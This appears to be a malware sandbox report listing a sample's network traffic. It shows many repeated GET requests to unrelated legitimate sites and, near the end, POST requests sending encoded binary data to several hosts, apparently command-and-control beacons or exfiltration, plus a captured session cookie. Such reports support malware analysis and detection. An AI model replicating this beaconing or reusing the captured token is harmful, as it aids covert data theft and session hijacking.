                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.clinicasanluis.com.co
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comContent-Length: 4776
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comContent-Length: 4776
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.clinicasanluis.com.co
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.clinicasanluis.com.coCookie: XSRF-TOKEN=eyJpdiI6ImxEUHpsV3JtaW5IRVQ4eUNZTjRWTXc9PSIsInZhbHVlIjoiQm5aQmpPNlN0UkZHenk0WkZsZDNFSmFuMThINm5kVXR2dFZoS1dDYVlTaHRiUkZlZGQyYUcwZTltNnRnN0VseGpEMVVTQi8xbjgrYUR6VWFBOW5ZMEx3Q2t2cGg0bFZPc25wdnVwOCtFSlRPTHVxNmRwbFk2Z1JUeEtBek55MGoiLCJtYWMiOiI3YjAxYTZjNDBiYzA2MmMxN2E4MDJmMzM3NzE3MTE2MDcxYTlhN2Q5NmNmMjVkZDVkMjMxZjZiZTk2ZGRiNGY1IiwidGFnIjoiIn0%3D; clinicasanluis_session=eyJpdiI6IlpUQjN3YnJteGN4eUZ0NTFQRlhVV1E9PSIsInZhbHVlIjoidkg3VXU3WGhUSllXVmxQSXNKekozZE1sSWpKVGtYbWROcVhVaCtpNWI3VytPd0dDQlRJd2diajIwTzMrbTFOdXI2NmJWYUI1MXQwQ2ZVTlA5d0NxRHhjd0hWM0VVbnZXRkozVWgwTjdsTEI1MlJWdFVsQmUxWGErU3lrQ01HcDMiLCJtYWMiOiJjZjIzZjQ4ZjU4NmNhNTE4NGE3YzJiYmU3YjMyODMxMWQ3YjMwZjIyMmU4N2NkYWYwNjllNWM5OGE2NjM2N2JlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comContent-Length: 37524
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 74 31 31 62 63 61 62 2b 6b 67 59 66 76 66 54 43 51 51 57 53 41 63 6e 75 4c 52 43 47 77 61 4e 36 4f 76 31 35 4f 67 6e 74 33 71 2f 32 53 71 78 2b 35 33 32 61 4e 65 37 33 74 42 74 62 59 39 6f 65 31 72 6e 46 2b 39 31 34 56 44 6b 50 34 46 4a 6d 69 6e 77 70 79 62 55 74 6e 59 46 42 2f 33 5a 4d 79 50 4b 72 51 70 33 32 38 2f 4f 61 74 75 45 30 57 46 45 44 45 52 74 58 38 6c 47 47 53 62 67 50 36 4d 2f 48 70 45 52 77 75 78 55 72 6b 79 4a 42 4c 7a 4d 45 63 6a 37 6f 75 71 69 32 56 34 73 46 56 72 37 63 39 43 75 37 64 51 4f 57 7a 69 68 69 44 79 41 36 53 4c 69 4f 79 35 6f 57 2b 58 61 37 45 34 65 46 74 6c 58 4b 71 6c 54 39 76 58 77 4c 6f 53 46 4e 5a 50 6e 36 68 52 61 55 4d 32 36 65 4a 69 66 47 5a 70 69 4d 6c 2f 34 4b 69 70 36 69 6b 70 31 4a 79 41 74 33 35 45 70 76 4e 59 62 67 77 51 69 71 78 69 52 6f 41 35 36 4f 59 75 51 68 5a 32 79 50 52 31 34 73 48 6c 5a 38 63 4d 76 50 6e 36 2b 55 65 4c 43 4c 37 30 34 4c 44 39 79 45 4d 61 7a 71 6d 55 64 71 63 2b 61 47 63 33 6d 77 2b 7a 63 68 32 4a 54 64 35 78 72 4c 6e 4a 68 7a 78 35 39 6c 4f 6e 73 2f 6d 6d 41 7a 43 4d 64 55 36 51 6c 6a 57 34 75 67 77 6c 74 7a 4c 6b 57 36 72 31 63 34 38 70 48 62 5a 5a 42 44 44 64 37 64 6c 6c 77 6a 44 6e 6b 43 30 56 45 59 51 43 32 39 36 58 33 39 43 34 48 5a 34 51 76 6e 4a 64 35 6f 2b 48 6b 71 33 49 5a 30 2b 4f 41 75 74 42 33 70 33 72 39 35 57 75 45 44 70 44 6c 73 5a 69 4c 69 63 37 36 4f 62 6b 78 62 6a 70 64 32 5a 74 58 4d 32 46 4d 72 6a 45 2f 6e 4c 4c 6e 44 56 6a 61 7a 32 74 4d 52 48 46 64 62 5a 30 5a 4b 39 52 63 46 53 30 58 71 61 50 33 61 49 4e 4c 48 2f 62 32 76 62 37 74 52 49 47 64 37 59 4f 65 70 50 68 6b 41 6c 44 67 58 6c 42 47 64 50 69 62 6f 45 56 50 71 53 46 44 51 52 46 33 78 42 62 59 58 50 6b 7a 5a 34 46 4d 66 32 76 58 56 4b 63 34 31 46 4f 7a 57 53 6a 65 46 33 69 4c 6c 34 6e 32 7a 39 77 3d 3d Data Ascii: t11bcab+kgYfvfTCQQWSAcnuLRCGwaN6Ov15Ognt3q/2Sqx+532aNe73tBtbY9oe1rnF+914VDkP4FJminwpybUtnYFB/3ZMyPKrQp328/OatuE0WFEDERtX8lGGSbgP6M/HpERwuxUrkyJBLzMEcj7ouqi2V4sFVr7c9Cu7dQOWzihiDyA6SLiOy5oW+Xa7E4eFtlXKqlT9vXwLoSFNZPn6hRaUM26eJifGZpiMl/4Kip6ikp1JyAt35EpvNYbgwQiqxiRoA56OYuQhZ2yPR14sHlZ8cMvPn6+UeLCL704LD9yEMazqmUdqc+aGc3mw+zch2JTd5xrLnJhzx59lOns/mmAzCMdU6QljW4ugwltzLkW6r1c48pHbZZBDDd7dllwjDnkC0VEYQC296X39C4HZ4QvnJd5o+Hkq3IZ0+OAutB3p3r95WuEDpDlsZiLic76Obkxbjpd2ZtXM2FMrjE/nLLnDVjaz2tMRHFdbZ0ZK9RcFS0XqaP3aINLH/b2vb7tRIGd7YOepPhkAlDgXlBGdPiboEVPqSFDQRF3xBbYXPkzZ4FMf2vXVKc41FOzWSjeF3iLl4n2z9w==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 70 75 58 7a 48 73 65 68 6d 41 59 33 5a 4b 53 47 39 6e 51 54 4c 35 42 37 76 73 43 39 6a 62 50 4a 36 79 46 32 6c 31 72 32 50 73 61 52 6a 48 77 32 78 76 50 72 6b 50 70 70 4d 5a 31 67 46 4d 73 78 34 77 61 4f 4e 79 51 33 55 4a 69 46 74 67 35 75 79 65 77 58 76 47 55 4f 41 57 4f 54 55 36 49 74 74 67 65 47 41 71 7a 30 6a 6e 55 75 70 43 33 50 62 54 4e 4c 41 4f 4e 6d 2f 30 68 5a 73 74 77 53 7a 61 59 58 56 48 76 54 62 36 54 55 6e 63 38 32 70 66 43 79 39 43 51 30 55 61 4a 32 66 35 42 68 51 34 68 4a 76 77 37 70 41 42 5a 57 6a 64 44 66 64 61 41 45 2f 33 64 4f 66 48 68 64 59 79 66 54 4a 51 6e 65 43 66 30 72 63 59 4f 35 2b 77 44 39 4f 66 52 41 67 4c 5a 53 78 2b 44 37 55 5a 74 6b 4b 2f 77 6a 73 6f 48 63 52 64 45 66 51 36 67 6c 66 4c 4c 30 46 71 78 79 75 4b 5a 33 70 77 42 4e 53 30 31 4e 6c 57 5a 50 39 48 33 37 72 47 52 48 6d 6c 4a 42 67 78 70 42 35 6d 61 43 4e 6c 30 56 39 70 2f 4a 75 66 4e 4d 34 78 67 36 4c 66 6b 78 57 5a 59 30 30 65 67 37 2f 70 43 33 6c 65 65 35 34 31 4a 4c 5a 67 79 38 45 4d 63 51 57 34 4b 2b 2b 63 63 67 37 77 63 77 42 52 59 6a 55 30 44 62 65 2b 43 68 45 44 77 63 31 6e 73 33 69 4d 6e 38 48 2f 53 2b 37 59 76 6a 37 62 6b 4e 32 6a 35 6a 31 70 33 72 78 5a 79 51 45 6f 75 63 39 56 63 41 6c 6e 56 2f 43 56 47 37 53 67 31 43 4f 6c 45 6f 71 51 30 4f 77 4e 77 70 65 43 57 63 50 4f 5a 69 58 6c 6a 55 48 51 57 67 78 66 45 42 66 4a 45 36 6f 74 32 64 31 34 46 4e 52 4d 2f 77 77 30 45 54 61 48 37 56 58 53 70 50 2f 63 36 72 65 66 52 56 53 55 35 37 41 34 2b 4b 4c 71 4c 48 66 61 45 2f 47 45 35 37 2f 39 72 6c 30 59 6c 6b 69 65 61 67 6f 79 47 47 4f 31 56 79 2b 4f 4d 78 5a 74 32 6a 52 43 6b 44 51 42 72 6f 34 59 6c 31 48 48 59 69 35 63 58 36 41 4f 74 68 2f 5a 33 35 Data Ascii: puXzHsehmAY3ZKSG9nQTL5B7vsC9jbPJ6yF2l1r2PsaRjHw2xvPrkPppMZ1gFMsx4waONyQ3UJiFtg5uyewXvGUOAWOTU6IttgeGAqz0jnUupC3PbTNLAONm/0hZstwSzaYXVHvTb6TUnc82pfCy9CQ0UaJ2f5BhQ4hJvw7pABZWjdDfdaAE/3dOfHhdYyfTJQneCf0rcYO5+wD9OfRAgLZSx+D7UZtkK/wjsoHcRdEfQ6glfLL0FqxyuKZ3pwBNS01NlWZP9H37rGRHmlJBgxpB5maCNl0V9p/JufNM4xg6LfkxWZY00eg7/pC3lee541JLZgy8EMcQW4K++ccg7wcwBRYjU0Dbe+ChEDwc1ns3iMn8H/S+7Yvj7bkN2j5j1p3rxZyQEouc9VcAlnV/CVG7Sg1COlEoqQ0OwNwpeCWcPOZiXljUHQWgxfEBfJE6ot2d14FNRM/ww0ETaH7VXSpP/c6refRVSU57A4+KLqLHfaE/GE57/9rl0YlkieagoyGGO1Vy+OMxZt2jRCkDQBro4Yl1HHYi5cX6AOth/Z35
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 2b 45 32 6e 6d 30 4a 65 6c 41 62 59 6e 74 6f 61 4e 51 6a 34 34 38 55 59 6b 6e 31 53 44 36 68 77 6c 75 42 43 4a 55 4d 72 6a 36 2f 75 74 39 35 6e 79 4b 67 51 55 63 2b 65 4f 63 42 52 4d 6d 41 4b 6e 6f 71 6c 69 72 67 48 32 76 5a 6b 53 41 45 64 75 52 30 6e 30 79 50 73 47 4c 4c 59 36 7a 65 35 48 42 6d 47 55 34 4f 35 6b 48 73 34 77 54 6d 34 32 6b 45 43 41 75 31 67 57 78 66 74 7a 7a 6f 71 5a 31 6a 58 66 49 6a 6e 4b 57 34 7a 48 71 67 2b 4e 6a 6c 37 4b 56 48 65 4f 41 32 49 56 67 56 62 31 50 5a 4b 59 47 55 42 78 61 4f 4e 36 71 47 53 73 76 74 72 48 37 57 30 69 6c 47 2f 46 59 62 55 35 7a 32 4a 56 66 57 33 61 55 47 64 42 48 4b 6a 34 6f 6c 79 55 7a 6b 63 68 67 5a 41 6d 52 64 4b 6b 4b 74 59 67 68 68 38 4a 6a 6e 32 68 79 38 56 6f 57 51 65 64 31 55 54 37 65 42 32 77 6d 42 2f 57 49 5a 58 36 32 68 66 6b 52 58 4f 6b 67 43 55 67 59 7a 76 42 79 43 35 55 71 54 4e 75 68 43 5a 73 41 4d 34 7a 30 4e 4d 4f 6f 41 69 62 4f 56 72 77 57 4a 46 74 58 6f 49 45 63 46 32 75 75 75 54 4b 72 35 64 39 36 34 44 69 44 65 57 49 51 30 54 52 37 39 34 5a 35 70 4a 4c 59 4a 76 45 36 58 33 64 55 45 57 54 76 58 36 46 4a 30 49 6b 57 50 75 63 63 30 37 4c 6c 55 5a 4a 48 57 58 4b 7a 49 71 55 63 76 78 48 2b 6f 6d 33 5a 76 5a 43 45 2b 6b 37 62 63 4d 2f 77 4a 62 6b 6d 55 36 30 4b 6e 56 4a 46 6d 76 2b 77 5a 79 38 2f 56 75 6c 48 78 59 59 6f 6c 49 57 63 41 64 4d 50 73 48 69 42 6a 6e 69 6d 2b 50 63 6c 30 68 52 4b 45 35 73 52 77 48 49 76 4f 2f 4e 4a 46 70 69 71 54 71 75 33 5a 4b 35 71 43 68 59 36 33 58 58 37 6d 67 57 69 67 36 73 72 33 52 6d 49 70 36 61 58 71 47 5a 4d 61 31 6d 72 5a 53 58 79 66 33 44 6d 78 77 73 41 4a 68 76 39 46 56 50 69 39 4b 51 62 41 3d Data Ascii: +E2nm0JelAbYntoaNQj448UYkn1SD6hwluBCJUMrj6/ut95nyKgQUc+eOcBRMmAKnoqlirgH2vZkSAEduR0n0yPsGLLY6ze5HBmGU4O5kHs4wTm42kECAu1gWxftzzoqZ1jXfIjnKW4zHqg+Njl7KVHeOA2IVgVb1PZKYGUBxaON6qGSsvtrH7W0ilG/FYbU5z2JVfW3aUGdBHKj4olyUzkchgZAmRdKkKtYghh8Jjn2hy8VoWQed1UT7eB2wmB/WIZX62hfkRXOkgCUgYzvByC5UqTNuhCZsAM4z0NMOoAibOVrwWJFtXoIEcF2uuuTKr5d964DiDeWIQ0TR794Z5pJLYJvE6X3dUEWTvX6FJ0IkWPucc07LlUZJHWXKzIqUcvxH+om3ZvZCE+k7bcM/wJbkmU60KnVJFmv+wZy8/VulHxYYolIWcAdMPsHiBjnim+Pcl0hRKE5sRwHIvO/NJFpiqTqu3ZK5qChY63XX7mgWig6sr3RmIp6aXqGZMa1mrZSXyf3DmxwsAJhv9FVPi9KQbA=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 76 62 39 5a 62 7a 45 2b 6d 77 5a 4b 70 39 38 7a 55 4b 48 68 66 34 72 52 33 57 39 76 65 34 2f 31 39 57 63 75 6e 50 55 42 55 32 72 65 30 66 76 44 69 66 37 67 4c 36 4a 5a 63 47 76 38 65 31 49 4b 37 49 4a 74 57 4d 4c 59 47 6f 64 66 56 4d 67 4f 34 46 35 41 39 69 57 54 43 55 59 2b 38 6f 66 79 39 59 72 68 6a 34 68 6f 41 70 36 75 39 44 58 4f 57 6d 6e 46 48 32 4e 6d 62 4e 7a 30 38 46 69 5a 4d 74 4b 36 32 61 76 54 6a 48 51 35 75 76 42 77 66 6e 55 61 5a 51 61 62 6f 31 45 70 48 66 4c 44 2b 64 49 64 54 51 4f 32 4b 74 64 38 6d 76 6b 4e 55 67 66 49 32 45 30 44 76 33 65 79 72 79 6f 6e 37 70 6a 5a 4d 63 63 63 37 68 52 32 56 76 2b 53 38 69 4f 65 5a 79 32 50 42 61 57 79 50 6c 43 34 71 31 46 66 6c 34 37 78 57 6a 46 72 31 38 6e 72 54 5a 55 63 57 56 34 52 48 59 75 47 6d 72 2b 37 63 6d 6d 72 4e 49 48 39 4f 49 6c 47 6f 5a 4c 7a 74 4e 33 71 6f 42 4f 59 4b 41 70 2b 37 57 78 65 59 43 2b 53 70 74 56 47 52 4c 6a 4d 59 49 42 38 70 7a 6c 41 6f 39 4d 35 43 6f 54 59 57 55 70 63 4f 76 52 35 4d 76 75 2b 4d 2b 32 51 61 79 73 44 35 36 65 6d 4f 43 73 4d 4c 36 6b 45 46 34 79 58 75 37 37 36 43 4f 32 51 44 4d 70 6e 30 61 34 73 76 48 78 48 4c 33 76 36 53 30 35 71 2b 4c 66 2b 68 46 5a 6f 4c 64 56 39 49 4c 53 47 63 61 79 32 32 6a 4d 72 6a 36 6d 70 68 68 44 73 69 31 4b 65 32 4a 67 55 68 65 74 48 48 39 75 46 48 59 47 79 75 44 2b 72 35 70 6a 30 7a 61 2f 4f 49 47 6a 73 38 37 43 4d 68 71 45 4e 4b 34 31 33 69 5a 4f 4e 33 71 4b 59 30 7a 6c 50 43 35 51 4b 34 33 70 70 72 72 65 72 69 57 4f 66 58 4a 37 78 37 53 39 78 43 36 43 41 78 34 39 78 58 48 49 79 6e 65 6c 61 4b 5a 73 71 6b 6f 34 41 74 54 4d 35 57 75 53 59 58 71 58 4e 48 58 50 6e 6a 51 74 73 70 5a 66 42 41 36 51 3d Data Ascii: vb9ZbzE+mwZKp98zUKHhf4rR3W9ve4/19WcunPUBU2re0fvDif7gL6JZcGv8e1IK7IJtWMLYGodfVMgO4F5A9iWTCUY+8ofy9Yrhj4hoAp6u9DXOWmnFH2NmbNz08FiZMtK62avTjHQ5uvBwfnUaZQabo1EpHfLD+dIdTQO2Ktd8mvkNUgfI2E0Dv3eyryon7pjZMccc7hR2Vv+S8iOeZy2PBaWyPlC4q1Ffl47xWjFr18nrTZUcWV4RHYuGmr+7cmmrNIH9OIlGoZLztN3qoBOYKAp+7WxeYC+SptVGRLjMYIB8pzlAo9M5CoTYWUpcOvR5Mvu+M+2QaysD56emOCsML6kEF4yXu776CO2QDMpn0a4svHxHL3v6S05q+Lf+hFZoLdV9ILSGcay22jMrj6mphhDsi1Ke2JgUhetHH9uFHYGyuD+r5pj0za/OIGjs87CMhqENK413iZON3qKY0zlPC5QK43pprreriWOfXJ7x7S9xC6CAx49xXHIynelaKZsqko4AtTM5WuSYXqXNHXPnjQtspZfBA6Q=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 2b 45 32 6e 6d 30 4a 65 6c 41 62 59 6e 74 6f 61 4e 51 6a 34 34 38 55 59 6b 6e 31 53 44 36 68 77 6c 75 42 43 4a 55 4d 72 6a 36 2f 75 74 39 35 6e 79 4b 67 51 55 63 2b 65 4f 63 42 52 4d 6d 41 4b 6e 6f 71 6c 69 72 67 48 32 76 5a 6b 53 41 45 64 75 52 30 6e 30 79 50 73 47 4c 4c 59 36 7a 65 35 48 42 6d 47 55 34 4f 35 6b 48 73 34 77 54 6d 34 32 6b 45 43 41 75 31 67 57 78 66 74 7a 7a 6f 71 5a 31 6a 58 66 49 6a 6e 4b 57 34 7a 48 71 67 2b 4e 6a 6c 37 4b 56 48 65 4f 41 32 49 56 67 56 62 31 50 5a 4b 59 47 55 42 78 61 4f 4e 36 71 47 53 73 76 74 72 48 37 57 30 69 6c 47 2f 46 59 62 55 35 7a 32 4a 56 66 57 33 61 55 47 64 42 48 4b 6a 34 6f 6c 79 55 7a 6b 63 68 67 5a 41 6d 52 64 4b 6b 4b 74 59 67 68 68 38 4a 6a 6e 32 68 79 38 56 6f 57 51 65 64 31 55 54 37 65 42 32 77 6d 42 2f 57 49 5a 58 36 32 68 66 6b 52 58 4f 6b 67 43 55 67 59 7a 76 42 79 43 35 55 71 54 4e 75 68 43 5a 73 41 4d 